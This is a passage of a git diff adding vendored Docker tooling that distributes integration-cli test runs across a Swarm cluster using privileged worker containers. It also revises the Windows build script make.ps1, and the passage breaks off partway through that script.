-0,0 +1,2 @@ +# dependencies specific to worker (i.e. github.com/docker/docker/...) are not vendored here +github.com/bfirsh/funker-go eaa0a2e06f30e72c9a0b7f858951e581e26ef773 diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/executor.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/executor.go new file mode 100644 index 0000000000..eef80d461e --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/executor.go @@ -0,0 +1,118 @@ +package main + +import ( + "bytes" + "context" + "fmt" + "io" + "os" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/stdcopy" +) + +// testChunkExecutor executes integration-cli binary. +// image needs to be the worker image itself. testFlags are OR-set of regexp for filtering tests. +type testChunkExecutor func(image string, tests []string) (int64, string, error) + +func dryTestChunkExecutor() testChunkExecutor { + return func(image string, tests []string) (int64, string, error) { + return 0, fmt.Sprintf("DRY RUN (image=%q, tests=%v)", image, tests), nil + } +} + +// privilegedTestChunkExecutor invokes a privileged container from the worker +// service via bind-mounted API socket so as to execute the test chunk +func privilegedTestChunkExecutor(autoRemove bool) testChunkExecutor { + return func(image string, tests []string) (int64, string, error) { + cli, err := client.NewEnvClient() + if err != nil { + return 0, "", err + } + // propagate variables from the host (needs to be defined in the compose file) + experimental := os.Getenv("DOCKER_EXPERIMENTAL") + graphdriver := os.Getenv("DOCKER_GRAPHDRIVER") + if graphdriver == "" { + info, err := cli.Info(context.Background()) + if err != nil { + return 0, "", err + } + graphdriver = info.Driver + } + // `daemon_dest` is similar to `$DEST` (e.g. `bundles/VERSION/test-integration`) + // but it exists outside of `bundles` so as to make `$DOCKER_GRAPHDRIVER` work. + // + // Without this hack, `$DOCKER_GRAPHDRIVER` fails because of (e.g.) `overlay2 is not supported over overlayfs` + // + // see integration-cli/daemon/daemon.go + daemonDest := "/daemon_dest" + config := container.Config{ + Image: image, + Env: []string{ + "TESTFLAGS=-check.f " + strings.Join(tests, "|"), + "KEEPBUNDLE=1", + "DOCKER_INTEGRATION_TESTS_VERIFIED=1", // for avoiding rebuilding integration-cli + "DOCKER_EXPERIMENTAL=" + experimental, + "DOCKER_GRAPHDRIVER=" + graphdriver, + "DOCKER_INTEGRATION_DAEMON_DEST=" + daemonDest, + }, + Labels: map[string]string{ + "org.dockerproject.integration-cli-on-swarm": "", + "org.dockerproject.integration-cli-on-swarm.comment": "this non-service container is created for running privileged programs on Swarm. you can remove this container manually if the corresponding service is already stopped.", + }, + Entrypoint: []string{"hack/dind"}, + Cmd: []string{"hack/make.sh", "test-integration"}, + } + hostConfig := container.HostConfig{ + AutoRemove: autoRemove, + Privileged: true, + Mounts: []mount.Mount{ + { + Type: mount.TypeVolume, + Target: daemonDest, + }, + }, + } + id, stream, err := runContainer(context.Background(), cli, config, hostConfig) + if err != nil { + return 0, "", err + } + var b bytes.Buffer + teeContainerStream(&b, os.Stdout, os.Stderr, stream) + resultC, errC := cli.ContainerWait(context.Background(), id, "") + select { + case err := <-errC: + return 0, "", err + case result := <-resultC: + return result.StatusCode, b.String(), nil + } + } +} + +func runContainer(ctx context.Context, cli *client.Client, config container.Config, hostConfig container.HostConfig) (string, io.ReadCloser, error) { + created, err := cli.ContainerCreate(context.Background(), + &config, &hostConfig, nil, "") + if err != nil { + return "", nil, err + } + if err = cli.ContainerStart(ctx, created.ID, types.ContainerStartOptions{}); err != nil { + return "", nil, err + } + stream, err := cli.ContainerLogs(ctx, + created.ID, + types.ContainerLogsOptions{ + ShowStdout: true, + ShowStderr: true, + Follow: true, + }) + return created.ID, stream, err +} + +func teeContainerStream(w, stdout, stderr io.Writer, stream io.ReadCloser) { + stdcopy.StdCopy(io.MultiWriter(w, stdout), io.MultiWriter(w, stderr), stream) + stream.Close() +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/worker.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/worker.go new file mode 100644 index 0000000000..ea8bb3fe27 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/worker.go @@ -0,0 +1,69 @@ +package main + +import ( + "flag" + "fmt" + "log" + "time" + + "github.com/bfirsh/funker-go" + "github.com/docker/distribution/reference" + "github.com/docker/docker/hack/integration-cli-on-swarm/agent/types" +) + +func main() { + if err := xmain(); err != nil { + log.Fatalf("fatal error: %v", err) + } +} + +func validImageDigest(s string) bool { + return reference.DigestRegexp.FindString(s) != "" +} + +func xmain() error { + workerImageDigest := flag.String("worker-image-digest", "", "Needs to be the digest of this worker image itself") + dryRun := flag.Bool("dry-run", false, "Dry run") + keepExecutor := flag.Bool("keep-executor", false, "Do not auto-remove executor containers, which is used for running privileged programs on Swarm") + flag.Parse() + if !validImageDigest(*workerImageDigest) { + // Because of issue #29582. + // `docker service create localregistry.example.com/blahblah:latest` pulls the image data to local, but not a tag. + // So, `docker run localregistry.example.com/blahblah:latest` fails: `Unable to find image 'localregistry.example.com/blahblah:latest' locally` + return fmt.Errorf("worker-image-digest must be a digest, got %q", *workerImageDigest) + } + executor := privilegedTestChunkExecutor(!*keepExecutor) + if *dryRun { + executor = dryTestChunkExecutor() + } + return handle(*workerImageDigest, executor) +} + +func handle(workerImageDigest string, executor testChunkExecutor) error { + log.Printf("Waiting for a funker request") + return funker.Handle(func(args *types.Args) types.Result { + log.Printf("Executing chunk %d, contains %d test filters", + args.ChunkID, len(args.Tests)) + begin := time.Now() + code, rawLog, err := executor(workerImageDigest, args.Tests) + if err != nil { + log.Printf("Error while executing chunk %d: %v", args.ChunkID, err) + if code == 0 { + // Make sure this is a failure + code = 1 + } + return types.Result{ + ChunkID: args.ChunkID, + Code: int(code), + RawLog: rawLog, + } + } + elapsed := time.Since(begin) + log.Printf("Finished chunk %d, code=%d, elapsed=%v", args.ChunkID, code, elapsed) + return types.Result{ + ChunkID: args.ChunkID, + Code: int(code), + RawLog: rawLog, + } + }) +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/compose.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/compose.go new file mode 100644 index 0000000000..a92282a1a0 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/compose.go @@ -0,0 +1,122 @@ +package main + +import ( + "context" + "io/ioutil" + "os" + "path/filepath" + "text/template" + + "github.com/docker/docker/client" +) + +const composeTemplate = `# generated by integration-cli-on-swarm +version: "3" + +services: + worker: + image: "{{.WorkerImage}}" + command: ["-worker-image-digest={{.WorkerImageDigest}}", "-dry-run={{.DryRun}}", "-keep-executor={{.KeepExecutor}}"] + networks: + - net + volumes: +# Bind-mount the API socket so that we can invoke "docker run --privileged" within the service containers + - /var/run/docker.sock:/var/run/docker.sock + environment: + - DOCKER_GRAPHDRIVER={{.EnvDockerGraphDriver}} + - DOCKER_EXPERIMENTAL={{.EnvDockerExperimental}} + deploy: + mode: replicated + replicas: {{.Replicas}} + restart_policy: +# The restart condition needs to be any for funker function + condition: any + + master: + image: "{{.MasterImage}}" + command: ["-worker-service=worker", "-input=/mnt/input", "-chunks={{.Chunks}}", "-shuffle={{.Shuffle}}", "-rand-seed={{.RandSeed}}"] + networks: + - net + volumes: + - {{.Volume}}:/mnt + deploy: + mode: replicated + replicas: 1 + restart_policy: + condition: none + placement: +# Make sure the master can access the volume + constraints: [node.id == {{.SelfNodeID}}] + +networks: + net: + +volumes: + {{.Volume}}: + external: true +` + +type composeOptions struct { + Replicas int + Chunks int + MasterImage string + WorkerImage string + Volume string + Shuffle bool + RandSeed int64 + DryRun bool + KeepExecutor bool +} + +type composeTemplateOptions struct { + composeOptions + WorkerImageDigest string + SelfNodeID string + EnvDockerGraphDriver string + EnvDockerExperimental string +} + +// createCompose creates "dir/docker-compose.yml". +// If dir is empty, TempDir() is used. +func createCompose(dir string, cli *client.Client, opts composeOptions) (string, error) { + if dir == "" { + var err error + dir, err = ioutil.TempDir("", "integration-cli-on-swarm-") + if err != nil { + return "", err + } + } + resolved := composeTemplateOptions{} + resolved.composeOptions = opts + workerImageInspect, _, err := cli.ImageInspectWithRaw(context.Background(), defaultWorkerImageName) + if err != nil { + return "", err + } + if len(workerImageInspect.RepoDigests) > 0 { + resolved.WorkerImageDigest = workerImageInspect.RepoDigests[0] + } else { + // fall back for non-pushed image + resolved.WorkerImageDigest = workerImageInspect.ID + } + info, err := cli.Info(context.Background()) + if err != nil { + return "", err + } + resolved.SelfNodeID = info.Swarm.NodeID + resolved.EnvDockerGraphDriver = os.Getenv("DOCKER_GRAPHDRIVER") + resolved.EnvDockerExperimental = os.Getenv("DOCKER_EXPERIMENTAL") + composeFilePath := filepath.Join(dir, "docker-compose.yml") + tmpl, err := template.New("").Parse(composeTemplate) + if err != nil { + return "", err + } + f, err := os.Create(composeFilePath) + if err != nil { + return "", err + } + defer f.Close() + if err = tmpl.Execute(f, resolved); err != nil { + return "", err + } + return composeFilePath, nil +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/dockercmd.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/dockercmd.go new file mode 100644 index 0000000000..c08b763a2b --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/dockercmd.go @@ -0,0 +1,64 @@ +package main + +import ( + "fmt" + "os" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/client" +) + +func system(commands [][]string) error { + for _, c := range commands { + cmd := exec.Command(c[0], c[1:]...) + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + cmd.Env = os.Environ() + if err := cmd.Run(); err != nil { + return err + } + } + return nil +} + +func pushImage(unusedCli *client.Client, remote, local string) error { + // FIXME: eliminate os/exec (but it is hard to pass auth without os/exec ...) + return system([][]string{ + {"docker", "image", "tag", local, remote}, + {"docker", "image", "push", remote}, + }) +} + +func deployStack(unusedCli *client.Client, stackName, composeFilePath string) error { + // FIXME: eliminate os/exec (but stack is implemented in CLI ...) + return system([][]string{ + {"docker", "stack", "deploy", + "--compose-file", composeFilePath, + "--with-registry-auth", + stackName}, + }) +} + +func hasStack(unusedCli *client.Client, stackName string) bool { + // FIXME: eliminate os/exec (but stack is implemented in CLI ...) + out, err := exec.Command("docker", "stack", "ls").CombinedOutput() + if err != nil { + panic(fmt.Errorf("`docker stack ls` failed with: %s", string(out))) + } + // FIXME: not accurate + return strings.Contains(string(out), stackName) +} + +func removeStack(unusedCli *client.Client, stackName string) error { + // FIXME: eliminate os/exec (but stack is implemented in CLI ...) + if err := system([][]string{ + {"docker", "stack", "rm", stackName}, + }); err != nil { + return err + } + // FIXME + time.Sleep(10 * time.Second) + return nil +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate.go new file mode 100644 index 0000000000..3354c23c07 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate.go @@ -0,0 +1,55 @@ +package main + +import ( + "fmt" + "io/ioutil" + "path/filepath" + "regexp" +) + +var testFuncRegexp *regexp.Regexp + +func init() { + testFuncRegexp = regexp.MustCompile(`(?m)^\s*func\s+\(\w*\s*\*(\w+Suite)\)\s+(Test\w+)`) +} + +func enumerateTestsForBytes(b []byte) ([]string, error) { + var tests []string + submatches := testFuncRegexp.FindAllSubmatch(b, -1) + for _, submatch := range submatches { + if len(submatch) == 3 { + tests = append(tests, fmt.Sprintf("%s.%s$", submatch[1], submatch[2])) + } + } + return tests, nil +} + +// enumerateTests enumerates valid `-check.f` strings for all the test functions. +// Note that we use regexp rather than parsing Go files for performance reason. +// (Try `TESTFLAGS=-check.list make test-integration` to see the slowness of parsing) +// The files needs to be `gofmt`-ed +// +// The result will be as follows, but unsorted ('$' is appended because they are regexp for `-check.f`): +// "DockerAuthzSuite.TestAuthZPluginAPIDenyResponse$" +// "DockerAuthzSuite.TestAuthZPluginAllowEventStream$" +// ... +// "DockerTrustedSwarmSuite.TestTrustedServiceUpdate$" +func enumerateTests(wd string) ([]string, error) { + testGoFiles, err := filepath.Glob(filepath.Join(wd, "integration-cli", "*_test.go")) + if err != nil { + return nil, err + } + var allTests []string + for _, testGoFile := range testGoFiles { + b, err := ioutil.ReadFile(testGoFile) + if err != nil { + return nil, err + } + tests, err := enumerateTestsForBytes(b) + if err != nil { + return nil, err + } + allTests = append(allTests, tests...) + } + return allTests, nil +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate_test.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate_test.go new file mode 100644 index 0000000000..d6049ae52e --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate_test.go @@ -0,0 +1,84 @@ +package main + +import ( + "os" + "path/filepath" + "reflect" + "sort" + "strings" + "testing" +) + +func getRepoTopDir(t *testing.T) string { + wd, err := os.Getwd() + if err != nil { + t.Fatal(err) + } + wd = filepath.Clean(wd) + suffix := "hack/integration-cli-on-swarm/host" + if !strings.HasSuffix(wd, suffix) { + t.Skipf("cwd seems strange (needs to have suffix %s): %v", suffix, wd) + } + return filepath.Clean(filepath.Join(wd, "../../..")) +} + +func TestEnumerateTests(t *testing.T) { + if testing.Short() { + t.Skip("skipping in short mode") + } + tests, err := enumerateTests(getRepoTopDir(t)) + if err != nil { + t.Fatal(err) + } + sort.Strings(tests) + t.Logf("enumerated %d test filter strings:", len(tests)) + for _, s := range tests { + t.Logf("- %q", s) + } +} + +func TestEnumerateTestsForBytes(t *testing.T) { + b := []byte(`package main +import ( + "github.com/go-check/check" +) + +func (s *FooSuite) TestA(c *check.C) { +} + +func (s *FooSuite) TestAAA(c *check.C) { +} + +func (s *BarSuite) TestBar(c *check.C) { +} + +func (x *FooSuite) TestC(c *check.C) { +} + +func (*FooSuite) TestD(c *check.C) { +} + +// should not be counted +func (s *FooSuite) testE(c *check.C) { +} + +// counted, although we don't support ungofmt file + func (s *FooSuite) TestF (c *check.C){} +`) + expected := []string{ + "FooSuite.TestA$", + "FooSuite.TestAAA$", + "BarSuite.TestBar$", + "FooSuite.TestC$", + "FooSuite.TestD$", + "FooSuite.TestF$", + } + + actual, err := enumerateTestsForBytes(b) + if err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(expected, actual) { + t.Fatalf("expected %q, got %q", expected, actual) + } +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/host.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/host.go new file mode 100644 index 0000000000..fdc2a83e7f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/host.go @@ -0,0 +1,198 @@ +package main + +import ( + "context" + "flag" + "fmt" + "io" + "io/ioutil" + "os" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/stdcopy" + "github.com/sirupsen/logrus" +) + +const ( + defaultStackName = "integration-cli-on-swarm" + defaultVolumeName = "integration-cli-on-swarm" + defaultMasterImageName = "integration-cli-master" + defaultWorkerImageName = "integration-cli-worker" +) + +func main() { + rc, err := xmain() + if err != nil { + logrus.Fatalf("fatal error: %v", err) + } + os.Exit(rc) +} + +func xmain() (int, error) { + // Should we use cobra maybe? + replicas := flag.Int("replicas", 1, "Number of worker service replica") + chunks := flag.Int("chunks", 0, "Number of test chunks executed in batch (0 == replicas)") + pushWorkerImage := flag.String("push-worker-image", "", "Push the worker image to the registry. Required for distributed execution. (empty == not to push)") + shuffle := flag.Bool("shuffle", false, "Shuffle the input so as to mitigate makespan nonuniformity") + // flags below are rarely used + randSeed := flag.Int64("rand-seed", int64(0), "Random seed used for shuffling (0 == current time)") + filtersFile := flag.String("filters-file", "", "Path to optional file composed of `-check.f` filter strings") + dryRun := flag.Bool("dry-run", false, "Dry run") + keepExecutor := flag.Bool("keep-executor", false, "Do not auto-remove executor containers, which is used for running privileged programs on Swarm") + flag.Parse() + if *chunks == 0 { + *chunks = *replicas + } + if *randSeed == int64(0) { + *randSeed = time.Now().UnixNano() + } + cli, err := client.NewEnvClient() + if err != nil { + return 1, err + } + if hasStack(cli, defaultStackName) { + logrus.Infof("Removing stack %s", defaultStackName) + removeStack(cli, defaultStackName) + } + if hasVolume(cli, defaultVolumeName) { + logrus.Infof("Removing volume %s", defaultVolumeName) + removeVolume(cli, defaultVolumeName) + } + if err = ensureImages(cli, []string{defaultWorkerImageName, defaultMasterImageName}); err != nil { + return 1, err + } + workerImageForStack := defaultWorkerImageName + if *pushWorkerImage != "" { + logrus.Infof("Pushing %s to %s", defaultWorkerImageName, *pushWorkerImage) + if err = pushImage(cli, *pushWorkerImage, defaultWorkerImageName); err != nil { + return 1, err + } + workerImageForStack = *pushWorkerImage + } + compose, err := createCompose("", cli, composeOptions{ + Replicas: *replicas, + Chunks: *chunks, + MasterImage: defaultMasterImageName, + WorkerImage: workerImageForStack, + Volume: defaultVolumeName, + Shuffle: *shuffle, + RandSeed: *randSeed, + DryRun: *dryRun, + KeepExecutor: *keepExecutor, + }) + if err != nil { + return 1, err + } + filters, err := filtersBytes(*filtersFile) + if err != nil { + return 1, err + } + logrus.Infof("Creating volume %s with input data", defaultVolumeName) + if err = createVolumeWithData(cli, + defaultVolumeName, + map[string][]byte{"/input": filters}, + defaultMasterImageName); err != nil { + return 1, err + } + logrus.Infof("Deploying stack %s from %s", defaultStackName, compose) + defer func() { + logrus.Infof("NOTE: You may want to inspect or clean up following resources:") + logrus.Infof(" - Stack: %s", defaultStackName) + logrus.Infof(" - Volume: %s", defaultVolumeName) + logrus.Infof(" - Compose file: %s", compose) + logrus.Infof(" - Master image: %s", defaultMasterImageName) + logrus.Infof(" - Worker image: %s", workerImageForStack) + }() + if err = deployStack(cli, defaultStackName, compose); err != nil { + return 1, err + } + logrus.Infof("The log will be displayed here after some duration."+ + "You can watch the live status via `docker service logs %s_worker`", + defaultStackName) + masterContainerID, err := waitForMasterUp(cli, defaultStackName) + if err != nil { + return 1, err + } + rc, err := waitForContainerCompletion(cli, os.Stdout, os.Stderr, masterContainerID) + if err != nil { + return 1, err + } + logrus.Infof("Exit status: %d", rc) + return int(rc), nil +} + +func ensureImages(cli *client.Client, images []string) error { + for _, image := range images { + _, _, err := cli.ImageInspectWithRaw(context.Background(), image) + if err != nil { + return fmt.Errorf("could not find image %s, please run `make build-integration-cli-on-swarm`: %v", + image, err) + } + } + return nil +} + +func filtersBytes(optionalFiltersFile string) ([]byte, error) { + var b []byte + if optionalFiltersFile == "" { + tests, err := enumerateTests(".") + if err != nil { + return b, err + } + b = []byte(strings.Join(tests, "\n") + "\n") + } else { + var err error + b, err = ioutil.ReadFile(optionalFiltersFile) + if err != nil { + return b, err + } + } + return b, nil +} + +func waitForMasterUp(cli *client.Client, stackName string) (string, error) { + // FIXME(AkihiroSuda): it should retry until master is up, rather than pre-sleeping + time.Sleep(10 * time.Second) + + fil := filters.NewArgs() + fil.Add("label", "com.docker.stack.namespace="+stackName) + // FIXME(AkihiroSuda): we should not rely on internal service naming convention + fil.Add("label", "com.docker.swarm.service.name="+stackName+"_master") + masters, err := cli.ContainerList(context.Background(), types.ContainerListOptions{ + All: true, + Filters: fil, + }) + if err != nil { + return "", err + } + if len(masters) == 0 { + return "", fmt.Errorf("master not running in stack %s?", stackName) + } + return masters[0].ID, nil +} + +func waitForContainerCompletion(cli *client.Client, stdout, stderr io.Writer, containerID string) (int64, error) { + stream, err := cli.ContainerLogs(context.Background(), + containerID, + types.ContainerLogsOptions{ + ShowStdout: true, + ShowStderr: true, + Follow: true, + }) + if err != nil { + return 1, err + } + stdcopy.StdCopy(stdout, stderr, stream) + stream.Close() + resultC, errC := cli.ContainerWait(context.Background(), containerID, "") + select { + case err := <-errC: + return 1, err + case result := <-resultC: + return result.StatusCode, nil + } +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/volume.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/volume.go new file mode 100644 index 0000000000..a6ddc6fae7 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/volume.go @@ -0,0 +1,88 @@ +package main + +import ( + "archive/tar" + "bytes" + "context" + "io" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/client" +) + +func createTar(data map[string][]byte) (io.Reader, error) { + var b bytes.Buffer + tw := tar.NewWriter(&b) + for path, datum := range data { + hdr := tar.Header{ + Name: path, + Mode: 0644, + Size: int64(len(datum)), + } + if err := tw.WriteHeader(&hdr); err != nil { + return nil, err + } + _, err := tw.Write(datum) + if err != nil { + return nil, err + } + } + if err := tw.Close(); err != nil { + return nil, err + } + return &b, nil +} + +// createVolumeWithData creates a volume with the given data (e.g. data["/foo"] = []byte("bar")) +// Internally, a container is created from the image so as to provision the data to the volume, +// which is attached to the container. +func createVolumeWithData(cli *client.Client, volumeName string, data map[string][]byte, image string) error { + _, err := cli.VolumeCreate(context.Background(), + volume.VolumeCreateBody{ + Driver: "local", + Name: volumeName, + }) + if err != nil { + return err + } + mnt := "/mnt" + miniContainer, err := cli.ContainerCreate(context.Background(), + &container.Config{ + Image: image, + }, + &container.HostConfig{ + Mounts: []mount.Mount{ + { + Type: mount.TypeVolume, + Source: volumeName, + Target: mnt, + }, + }, + }, nil, "") + if err != nil { + return err + } + tr, err := createTar(data) + if err != nil { + return err + } + if cli.CopyToContainer(context.Background(), + miniContainer.ID, mnt, tr, types.CopyToContainerOptions{}); err != nil { + return err + } + return cli.ContainerRemove(context.Background(), + miniContainer.ID, + types.ContainerRemoveOptions{}) +} + +func hasVolume(cli *client.Client, volumeName string) bool { + _, err := cli.VolumeInspect(context.Background(), volumeName) + return err == nil +} + +func removeVolume(cli *client.Client, volumeName string) error { + return cli.VolumeRemove(context.Background(), volumeName, true) +} diff --git a/vendor/github.com/docker/docker/hack/make.ps1 b/vendor/github.com/docker/docker/hack/make.ps1 index 14b9603b2e..70b9a47726 100644 --- a/vendor/github.com/docker/docker/hack/make.ps1 +++ b/vendor/github.com/docker/docker/hack/make.ps1 @@ -17,11 +17,12 @@ development and Windows to Windows CI. Usage Examples (run from repo root): - "hack\make.ps1 -Binary" to build the binaries - "hack\make.ps1 -Client" to build just the client 64-bit binary + "hack\make.ps1 -Client" to build docker.exe client 64-bit binary (remote repo) "hack\make.ps1 -TestUnit" to run unit tests - "hack\make.ps1 -Binary -TestUnit" to build the binaries and run unit tests - "hack\make.ps1 -All" to run everything this script knows about + "hack\make.ps1 -Daemon -TestUnit" to build the daemon and run unit tests + "hack\make.ps1 -All" to run everything this script knows about that can run in a container + "hack\make.ps1" to build the daemon binary (same as -Daemon) + "hack\make.ps1 -Binary" shortcut to -Client and -Daemon .PARAMETER Client Builds the client binaries. @@ -30,7 +31,7 @@ Builds the daemon binary. .PARAMETER Binary - Builds the client binaries and the daemon binary. A convenient shortcut to `make.ps1 -Client -Daemon`. + Builds the client and daemon binaries. A convenient shortcut to `make.ps1 -Client -Daemon`. .PARAMETER Race Use -race in go build and go test. @@ -48,24 +49,23 @@ Adds a custom string to be appended to the commit ID (spaces are stripped). .PARAMETER DCO - Runs the DCO (Developer Certificate Of Origin) test. + Runs the DCO (Developer Certificate Of Origin) test (must be run outside a container). .PARAMETER PkgImports - Runs the pkg\ directory imports test. + Runs the pkg\ directory imports test (must be run outside a container). .PARAMETER GoFormat - Runs the Go formatting test. + Runs the Go formatting test (must be run outside a container). .PARAMETER TestUnit Runs unit tests. .PARAMETER All - Runs everything this script knows about. + Runs everything this script knows about that can run in a container. TODO - Unify the head commit -- Sort out the GITCOMMIT environment variable in the absense of a .git (longer term) - Add golint and other checks (swagger maybe?) #> @@ -88,6 +88,7 @@ param( ) $ErrorActionPreference = "Stop" +$ProgressPreference = "SilentlyContinue" $pushed=$False # To restore the directory if we have temporarily pushed to one. # Utility function to get the commit ID of the repository @@ -98,7 +99,7 @@ Function Get-GitCommit() { if ($env:DOCKER_GITCOMMIT.Length -eq 0) { Throw ".git directory missing and DOCKER_GITCOMMIT environment variable not specified." } - Write-Host "INFO: Git commit assumed from DOCKER_GITCOMMIT environment variable" + Write-Host "INFO: Git commit ($env:DOCKER_GITCOMMIT) assumed from DOCKER_GITCOMMIT environment variable" return $env:DOCKER_GITCOMMIT } $gitCommit=$(git rev-parse --short HEAD) @@ -113,12 +114,6 @@ Function Get-GitCommit() { return $gitCommit } -# Utility function to get get the current build version of docker -Function Get-DockerVersion() { - if (-not (Test-Path ".\VERSION")) { Throw "VERSION file not found. Is this running from the root of a docker repository?" } - return $(Get-Content ".\VERSION" -raw).ToString().Replace("`n","").Trim() -} - # Utility function to determine if we are running in a container or not. # In Windows, we get this through an environment variable set in `Dockerfile.Windows` Function Check-InContainer() { @@ -126,6 +121,25 @@ Function Check-InContainer() { Write-Host "" Write-Warning "Not running in a container. The result might be an incorrect build." Write-Host "" + return $False + } + return $True +} + +# Utility function to warn if the version of go is correct. Used for local builds +# outside of a container where it may be out of date with master. +Function Verify-GoVersion() { + Try { + $goVersionDockerfile=(Get-Content ".\Dockerfile" | Select-String "ENV GO_VERSION").ToString().Split(" ")[2] + $goVersionInstalled=(go version).ToString().Split(" ")[2].SubString(2) + } + Catch [Exception] { + Throw "Failed to validate go version correctness: $_" + } + if (-not($goVersionInstalled -eq $goVersionDockerfile)) { + Write-Host "" + Write-Warning "Building with golang version $goVersionInstalled. You should update to $goVersionDockerfile" + Write-Host "" } } @@ -156,7 +170,7 @@ Function Execute-Build($type, $additionalBuildTags, $directory) { if ($Race) { Write-Warning "Using race detector"; $raceParm=" -race"} if ($ForceBuildAll) { $allParm=" -a" } if ($NoOpt) { $optParm=" -gcflags "+""""+"-N -l"+"""" } - if ($addtionalBuildTags -ne "") { $buildTags += $(" " + $additionalBuildTags) } + if ($additionalBuildTags -ne "") { $buildTags += $(" " + $additionalBuildTags) } # Do the go build in the appropriate directory # Note -linkmode=internal is required to be able to debug on Windows. @@ -184,7 +198,7 @@ Function Validate-DCO($headCommit, $upstreamCommit) { $usernameRegex='[a-zA-Z0-9][a-zA-Z0-9-]+' $dcoPrefix="Signed-off-by:" - $dcoRegex="^(Docker-DCO-1.1-)?$dcoPrefix ([^<]+) <([^<>@]+@[^<>]+)>( \\(github: ($usernameRegex)\\))?$" + $dcoRegex="^(Docker-DCO-1.1-)?$dcoPrefix ([^<]+) <([^<>@]+@[^<>]+)>( \(github: ($usernameRegex)\))?$" $counts = Invoke-Expression "git diff --numstat $upstreamCommit...$headCommit" if ($LASTEXITCODE -ne 0) { Throw "Failed git diff --numstat" } @@ -237,10 +251,10 @@ Function Validate-PkgImports($headCommit, $upstreamCommit) { if ($LASTEXITCODE -ne 0) { Throw "Failed go list for dependencies on $file" } $imports = $imports -Replace "\[" -Replace "\]", "" -Split(" ") | Sort-Object | Get-Unique # Filter out what we are looking for - $imports = $imports -NotMatch "^github.com/docker/docker/pkg/" ` - -NotMatch "^github.com/docker/docker/vendor" ` - -Match "^github.com/docker/docker" ` - -Replace "`n", "" + $imports = @() + $imports -NotMatch "^github.com/docker/docker/pkg/" ` + -NotMatch "^github.com/docker/docker/vendor" ` + -Match "^github.com/docker/docker" ` + -Replace "`n", "" $imports | % { $badFiles+="$file imports $_`n" } } if ($badFiles.Length -eq 0) { @@ -261,7 +275,7 @@ Function Validate-GoFormat($headCommit, $upstreamCommit) { # Get a list of all go source-code files which have changed. Ignore exit code on next call - always process regardless $files=@(); $files = Invoke-Expression "git diff $upstreamCommit...$headCommit --diff-filter=ACMR --name-only -- `'*.go`'" - $files = $files | Select-String -NotMatch "^vendor/" | Select-String -NotMatch "^cli/compose/schema/bindata.go" + $files = $files | Select-String -NotMatch "^vendor/" $badFiles=@(); $files | %{ # Deliberately ignore error on next line - treat as failed $content=Invoke-Expression "git show $headCommit`:$_" @@ -273,9 +287,10 @@ Function Validate-GoFormat($headCommit, $upstreamCommit) { $outputFile=[System.IO.Path]::GetTempFileName() if (Test-Path $outputFile) { Remove-Item $outputFile } [System.IO.File]::WriteAllText($outputFile, $content, (New-Object System.Text.UTF8Encoding($False))) - $valid=Invoke-Expression "gofmt -s -l $outputFile" - Write-Host "Checking $outputFile" - if ($valid.Length -ne 0) { $badFiles+=$_ } + $currentFile = $_ -Replace("/","\") + Write-Host Checking $currentFile + Invoke-Expression "gofmt -s -l $outputFile" + if ($LASTEXITCODE -ne 0) { $badFiles+=$currentFile } if (Test-Path $outputFile) { Remove-Item $outputFile } } if ($badFiles.Length -eq 0) { @@ -298,7 +313,7 @@ Function Run-UnitTests() { $pkgList = $pkgList | Select-String -Pattern "github.com/docker/docker" $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/vendor" $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/man" - $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/integration-cli" + $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/integration" $pkgList = $pkgList -replace "`r`n", " " $goTestCommand = "go test" + $raceParm + " -cover -ldflags -w -tags """ + "autogen daemon" + """ -a """ + "-test.timeout=10m" + """ $pkgList" Invoke-Expression $goTestCommand @@ -308,16 +323,21 @@ Function Run-UnitTests() { # Start of main code. Try { Write-Host -ForegroundColor Cyan "INFO: make.ps1 starting at $(Get-Date)" - $root=$(pwd) + + # Get to the root of the repo + $root = $(Split-Path $MyInvocation.MyCommand.Definition -Parent | Split-Path -Parent) + Push-Location $root # Handle 